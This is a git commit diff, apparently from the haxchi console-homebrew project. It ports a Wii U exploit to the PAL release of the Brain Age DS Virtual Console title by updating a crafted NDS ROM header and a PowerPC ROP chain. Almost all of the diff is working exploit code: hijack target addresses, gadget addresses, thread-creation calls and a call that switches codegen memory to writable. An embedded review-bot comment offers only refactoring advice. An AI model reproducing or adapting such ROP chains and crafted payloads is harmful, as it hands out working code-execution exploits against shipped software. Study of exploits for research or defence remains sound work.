ported over to the pal version of brain age

This commit is contained in:
FIX94 2016-11-08 00:37:34 +01:00
parent 37443ff760
commit 73c327adf2
2 changed files with 29 additions and 28 deletions


@ -1,7 +1,7 @@
.create "haxchi.srl", 0
.nds
hax_target_address equ 0x107968AC
hax_target_address equ 0x1076FAA4
code_target_address equ (0xF4000000 + 0xFD2000)
.org 0x000
@ -15,11 +15,11 @@ code_target_address equ (0xF4000000 + 0xFD2000)
.org 0x020
.word arm9_data ; ARM9 rom_offset
.word 0x20000000 ; ARM9 entry_address
.word 0xEBBC0E00 + code_target_address ; ARM9 ram_address
.word 0xEBDDFC00 + code_target_address ; ARM9 ram_address
.word arm9_data_end - arm9_data ; ARM9 size
.word arm7_data ; ARM7 rom_offset
.word 0x2000000 ; ARM7 entry_address
.word 0xEBBC0E00 + hax_target_address ; ARM7 ram_address
.word 0xEBDDFC00 + hax_target_address ; ARM7 ram_address
.word arm7_data_end - arm7_data ; ARM7 size
.org 0x080
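Review bot: The bias `0xEBDDFC00` is written out twice, in the ARM9 and ARM7 `ram_address` words, and it changed together with `hax_target_address` in this port, so it looks like a per-title value that the next port will have to update in two places; define it once beside the other constants, `hax_ram_bias equ 0xEBDDFC00`, and write the two words as `.word hax_ram_bias + code_target_address` and `.word hax_ram_bias + hax_target_address`. Nothing in the header records which title build these addresses were derived from; a comment on the `hax_target_address` line such as `; PAL Brain Age build - title/region specific, re-derive for any other dump` would stop the file being assembled against the wrong version. What the bias actually encodes is not visible in this hunk, so the suggested name is a guess to confirm against the loader.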


@ -1,23 +1,23 @@
MAIN_STACKTOP equ (0x30796C00)
CORE0_STACKORIG equ (0x2B566050) ; TEMP ?
CORE0_ROPSTART equ (CORE0_STACKORIG + 0x2054) ; TEMP ?
CORE0_STACKORIG equ (0x2B267B50) ; TEMP ?
CORE0_ROPSTART equ (CORE0_STACKORIG + 0xAFC) ; TEMP ?
RPX_OFFSET equ (0x01800000)
COREINIT_OFFSET equ (- 0xFE3C00)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02206FA8)
BCTRL equ (RPX_OFFSET + 0x02206FBC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E92C8)
LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR equ (RPX_OFFSET + 0x02026DE0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02208F6C)
MTCTR_R28_ADDI_R6x68_MR_R5R29_R4R22_R3R21_BCTRL equ (RPX_OFFSET + 0x02208E90)
BCTRL equ (RPX_OFFSET + 0x02208EA4)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x0209A500)
LWZ_R0x104_MTLR_R0_ADDI_R1x100_BLR equ (RPX_OFFSET + 0x020E0108)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x0209A12C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020A38AC)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0216FBF0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02279BB8)
MTCTR_R30_MR_R8R21_R7R29_R6R28_R5R27_R4R25_R3R24_BCTRL equ (COREINIT_OFFSET + 0x02002968)
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
HACHI_APPLICATION_PTR equ (0x10c8c938)
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02223C40)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222405C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02007774)
;HACHI_APPLICATION_PTR equ (0x10A6E038) ;probably wrong
OS_CREATETHREAD equ (0x02025764 + COREINIT_OFFSET)
OS_GETTHREADAFFINITY equ (0x020266A4 + COREINIT_OFFSET)
@ -27,15 +27,15 @@ OSCODEGEN_SWITCHSECMODE equ (0x0201B2C0 + COREINIT_OFFSET)
MEMCPY equ (0x02019BC8 + COREINIT_OFFSET)
DC_FLUSHRANGE equ (0x02007B88 + COREINIT_OFFSET)
IC_INVALIDATERANGE equ (0x02007CB0 + COREINIT_OFFSET)
SYS_LAUNCHSETTINGS equ (0x03B9B25C)
_EXIT equ (0x0229a240 + RPX_OFFSET)
exit equ (0x022924b0 + RPX_OFFSET)
;SYS_LAUNCHSETTINGS equ (0x03B9B25C)
;_EXIT equ (0x0229a240 + RPX_OFFSET)
;exit equ (0x022924b0 + RPX_OFFSET)
OSFATAL equ (0x02015218 + COREINIT_OFFSET)
CODEGEN_ADR equ 0x01800000
NERD_THREADOBJECT equ (0x107968AC - 0x1000)
NERD_THREADOBJECT equ (0x1076FAA4 - 0x1000)
.macro set_sp,v
.word LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR
@ -134,7 +134,7 @@ NERD_THREADOBJECT equ (0x107968AC - 0x1000)
.create "haxchi_rop_hook.bin", 0x107968AC
.create "haxchi_rop_hook.bin", 0x1076FAA4
.arm.big
rop_hook_start:
@ -150,10 +150,9 @@ rop_hook_start:
.arm.big
rop_start:
; call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
; call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
;call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
;call_func OSFATAL, 0x1007E7A8, 0, 0, 0
;call_func SYS_LAUNCHSETTINGS, 0, 0, 0, 0
; call_func exit, 0, 0, 0, 0
; call_func _EXIT, 0, 0, 0, 0
; .word _EXIT
@ -163,13 +162,15 @@ rop_start:
; .word 0xDEADBABE ; garbage
; .word 0xDEADBABE ; garbage
; .word 0xDEADBABE ; garbage
call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0x2054_MTLR_R0_ADDI_R1x2050_BLR, 0xDEAD0DAD, thread_param, 0x0, 0x0
call_func_6args NERD_CREATETHREAD, NERD_THREADOBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread_param, 0x0, 0x0
call_func OS_GETTHREADAFFINITY, NERD_THREADOBJECT, 0, 0, 0
call_func MEMCPY, CORE0_ROPSTART, core0rop, core0rop_end - core0rop, 0x0
call_func NERD_STARTTHREAD, NERD_THREADOBJECT, 0x0, 0x0, 0x0
;call_func DC_FLUSHRANGE, 0x1076EAA4, 0x1000, 0x0, 0x0
call_func BCTRL, 0x0, 0x0, 0x0, 0x0 ; infinite loop
core0rop:
; .word OSFATAL
; switch codegen to RW
call_func OSCODEGEN_SWITCHSECMODE, 0x0, 0x0, 0x0, 0x0